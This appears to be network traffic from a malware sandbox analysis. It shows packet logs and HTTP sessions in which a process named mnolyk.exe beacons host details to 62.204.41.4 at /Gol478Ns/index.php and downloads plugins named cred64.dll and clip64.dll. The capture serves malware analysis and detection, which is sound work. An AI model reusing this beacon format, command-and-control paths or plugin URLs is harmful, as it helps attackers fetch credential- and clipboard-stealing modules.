                                                        Feb 6, 2023 14:19:03.710764885 CET805019462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.710855961 CET5019480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.823386908 CET5019480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.826237917 CET5019580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.882898092 CET805019462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.883034945 CET5019480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.887649059 CET805019562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.887762070 CET5019580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.888103962 CET5019580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:03.949440002 CET805019562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.951908112 CET805019562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:03.952028990 CET5019580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.060388088 CET5019580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.061306000 CET5019680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.121963024 CET805019562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:04.122092962 CET5019580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.122922897 CET805019662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:04.123018026 CET5019680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.123384953 CET5019680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:04.185039997 CET805019662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:04.188596964 CET805019662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:13.479648113 CET5022680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.484760046 CET5022780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.541876078 CET805022662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:13.542584896 CET5022680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.544352055 CET805022762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:13.544537067 CET5022780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.545015097 CET5022780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.604593039 CET805022762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:13.608417034 CET805022762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:13.608547926 CET5022780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.717015028 CET5022780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.718290091 CET5022880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.776716948 CET805022762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:13.776823044 CET5022780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.780766010 CET805022862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:13.780953884 CET5022880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.781549931 CET5022880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.843877077 CET805022862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:13.847825050 CET805022862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:13.848026991 CET5022880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.963879108 CET5022880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:13.964576960 CET5022980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.024205923 CET805022962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.024322987 CET5022980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.024749994 CET5022980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.026307106 CET805022862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.026381969 CET5022880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.084294081 CET805022962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.089824915 CET805022962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.089921951 CET5022980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.197875977 CET5022980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.198739052 CET5023080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.257551908 CET805022962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.257693052 CET5022980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.259342909 CET805023062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.259510040 CET5023080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.260159016 CET5023080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.320748091 CET805023062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.326316118 CET805023062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.326647043 CET5023080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.441436052 CET5023080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.442356110 CET5023180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.505348921 CET805023162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.505384922 CET805023062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.505590916 CET5023080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.505712986 CET5023180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.506548882 CET5023180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.567112923 CET805023162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.571222067 CET805023162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.571419954 CET5023180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.687411070 CET5023180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.688735962 CET5023280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.748217106 CET805023162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.749021053 CET805023262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.749196053 CET5023180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.749268055 CET5023280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.756016016 CET5023280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.817076921 CET805023262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.823223114 CET805023262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.824412107 CET5023280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.935731888 CET5023280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.936695099 CET5023380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.996278048 CET805023262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.996464014 CET5023280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:14.999247074 CET805023362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:14.999850988 CET5023380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:15.000211954 CET5023380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:15.062627077 CET805023362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:15.083638906 CET805023362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:15.083945990 CET5023380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:15.198168039 CET5023380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:15.199048042 CET5023480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:15.260390043 CET805023462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:15.260653973 CET805023362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:15.260817051 CET5023380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:15.263904095 CET5023480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:15.265930891 CET5023480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:15.327347994 CET805023462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:15.331311941 CET805023462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:15.331430912 CET5023480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:15.449963093 CET5023480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:15.451117992 CET5023580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:15.511429071 CET805023462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:15.512312889 CET805023562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:15.512358904 CET5023480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:15.512474060 CET5023580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:15.519092083 CET5023580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:15.581948996 CET805023562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:15.585570097 CET805023562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:15.587949991 CET5023580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:15.698405981 CET5023580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:15.699130058 CET5023680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:15.759939909 CET805023562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:15.760050058 CET5023580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:15.761478901 CET805023662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:15.761581898 CET5023680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:15.762067080 CET5023680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:15.824362040 CET805023662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:15.827687025 CET805023662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:15.827852011 CET5023680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:15.952301025 CET5023680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:15.954051971 CET5023780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.014823914 CET805023662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:16.015055895 CET5023680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.016422987 CET805023762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:16.016624928 CET5023780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.017119884 CET5023780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.079469919 CET805023762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:16.085264921 CET805023762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:16.085468054 CET5023780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.207809925 CET5023780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.208584070 CET5023880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.270180941 CET805023862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:16.270410061 CET805023762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:16.270461082 CET5023880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.270522118 CET5023780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.271311998 CET5023880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.332859993 CET805023862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:16.337477922 CET805023862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:16.337625980 CET5023880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.448304892 CET5023880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.449040890 CET5023980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.509599924 CET805023962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:16.509849072 CET5023980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.509887934 CET805023862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:16.509972095 CET5023880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.511065006 CET5023980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.572138071 CET805023962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:16.574798107 CET805023962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:16.574878931 CET5023980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.682877064 CET5023980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.683631897 CET5024080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.743426085 CET805023962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:16.743534088 CET5023980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.745031118 CET805024062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:16.745126963 CET5024080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.745452881 CET5024080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.806788921 CET805024062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:16.811587095 CET805024062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:16.811683893 CET5024080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.935195923 CET5024080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.936429977 CET5024180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.996691942 CET805024062.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:16.996776104 CET5024080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.998264074 CET805024162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:16.998351097 CET5024180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:16.998707056 CET5024180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:17.060481071 CET805024162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:17.066359997 CET805024162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:17.066495895 CET5024180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:17.183320999 CET5024280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:17.183340073 CET5024180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:17.244304895 CET805024262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:17.244568110 CET5024280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:17.244961977 CET5024280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:17.245085955 CET805024162.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:17.245167971 CET5024180192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:17.305691004 CET805024262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:17.309746027 CET805024262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:17.309860945 CET5024280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:17.418657064 CET5024280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:17.419601917 CET5024380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:17.479476929 CET805024262.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:17.479684114 CET5024280192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:17.481839895 CET805024362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:17.482007980 CET5024380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:17.486099958 CET5024380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:17.548367977 CET805024362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:17.552581072 CET805024362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:17.552656889 CET5024380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:17.667304039 CET5024380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:17.668296099 CET5024480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:17.728832006 CET805024462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:17.728992939 CET5024480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:17.729582071 CET5024480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:17.729715109 CET805024362.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:17.729782104 CET5024380192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:17.789999962 CET805024462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:17.794356108 CET805024462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:17.798122883 CET5024480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:17.901667118 CET5024480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:17.902604103 CET5024580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:17.962307930 CET805024462.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:17.962517023 CET5024480192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:17.964046955 CET805024562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:17.964917898 CET5024580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:17.964917898 CET5024580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:18.026509047 CET805024562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:18.029665947 CET805024562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:18.034617901 CET5024580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:18.135500908 CET5024580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:18.136148930 CET5024680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:18.197141886 CET805024562.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:18.197770119 CET805024662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:18.197931051 CET5024580192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:18.197985888 CET5024680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:18.198358059 CET5024680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:18.259826899 CET805024662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:18.267981052 CET805024662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:18.270122051 CET5024680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:18.385893106 CET5024680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:18.386611938 CET5024780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:18.447521925 CET805024662.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:18.447904110 CET805024762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:18.448035955 CET5024680192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:18.448071003 CET5024780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:18.456525087 CET5024780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:18.518029928 CET805024762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:18.521711111 CET805024762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:18.521907091 CET5024780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:18.640186071 CET5024780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:18.640824080 CET5024880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:18.701410055 CET805024862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:18.701564074 CET805024762.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:18.701630116 CET5024880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:18.701687098 CET5024780192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:18.703803062 CET5024880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:18.764962912 CET805024862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:18.769320965 CET805024862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:18.769452095 CET5024880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:18.886457920 CET5024880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:18.887789011 CET5024980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:18.947295904 CET805024862.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:18.947475910 CET5024880192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:18.949084997 CET805024962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:18.949222088 CET5024980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:18.949647903 CET5024980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:19.010977983 CET805024962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:19.013935089 CET805024962.204.41.4192.168.2.5
                                                        Feb 6, 2023 14:19:19.014077902 CET5024980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:19.120429993 CET5024980192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:19.121177912 CET5025080192.168.2.562.204.41.4
                                                        Feb 6, 2023 14:19:19.181969881 CET805024962.204.41.4192.168.2.5
                                                        • 62.204.41.4
                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        0 | 192.168.2.5 | 49691 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:28.832691908 CET | 104 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:28.896934986 CET | 105 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:28 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        1 | 192.168.2.5 | 49690 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:28.837604046 CET | 104 | OUT | GET /Gol478Ns/Plugins/cred64.dll HTTP/1.1
                                                        Host: 62.204.41.4
                                                        Feb 6, 2023 14:16:28.898228884 CET | 105 | IN | HTTP/1.1 404 Not Found
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:28 GMT
                                                        Content-Type: text/html
                                                        Content-Length: 162
                                                        Connection: keep-alive
                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                        Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                                                        Feb 6, 2023 14:16:28.917882919 CET | 105 | OUT | GET /Gol478Ns/Plugins/clip64.dll HTTP/1.1
                                                        Host: 62.204.41.4
                                                        Feb 6, 2023 14:16:28.979448080 CET | 107 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:28 GMT
                                                        Content-Type: application/octet-stream
                                                        Content-Length: 91136
                                                        Last-Modified: Fri, 03 Feb 2023 17:19:21 GMT
                                                        Connection: keep-alive
                                                        ETag: "63dd4219-16400"
                                                        Accept-Ranges: bytes


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        10 | 192.168.2.5 | 49700 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:16:31.043766975 CET | 210 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:16:31.124840975 CET | 211 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:16:31 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        100 | 192.168.2.5 | 49790 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:11.646769047 CET | 301 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
                                                        Feb 6, 2023 14:17:11.715131998 CET | 302 | IN | HTTP/1.1 200 OK
                                                        Server: nginx/1.18.0 (Ubuntu)
                                                        Date: Mon, 06 Feb 2023 13:17:11 GMT
                                                        Content-Type: text/html; charset=UTF-8
                                                        Transfer-Encoding: chunked
                                                        Connection: keep-alive
                                                        Data Raw: 36 0d 0a 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a
                                                        Data Ascii: 6<c><d>0


                                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                                        101 | 192.168.2.5 | 49791 | 62.204.41.4 | 80 | C:\Users\user\AppData\Local\Temp\4b9a106e76\mnolyk.exe
                                                        Timestamp | kBytes transferred | Direction | Data
                                                        Feb 6, 2023 14:17:11.901330948 CET | 302 | OUT | POST /Gol478Ns/index.php HTTP/1.1
                                                        Content-Type: application/x-www-form-urlencoded
                                                        Host: 62.204.41.4
                                                        Content-Length: 88
                                                        Cache-Control: no-cache
                                                        Data Raw: 69 64 3d 38 35 33 33 32 31 39 33 35 32 31 32 26 76 73 3d 33 2e 36 36 26 73 64 3d 36 66 38 63 30 66 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 30 39 33 39 35 34 26 75 6e 3d 61 6c 66 6f 6e 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 26 6f 67 3d 31
                                                        Data Ascii: id=853321935212&vs=3.66&sd=6f8c0f&os=1&bi=1&ar=1&pc=093954&un=user&dm=&av=13&lv=0&og=1
